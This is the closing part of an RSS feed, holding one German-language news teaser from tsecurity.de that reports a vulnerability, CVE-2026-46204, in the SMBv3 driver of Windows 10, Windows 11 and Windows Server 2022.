<pubDate>Sun, 31 May 2026 20:30:56 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Besonders brisant: Eine als CVE-2026-46204 registrierte Sicherheitslücke im SMBv3-Treiber von Windows 10, Windows 11 und <b>Windows Server</b> 2022. Mit ...]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,08ms -->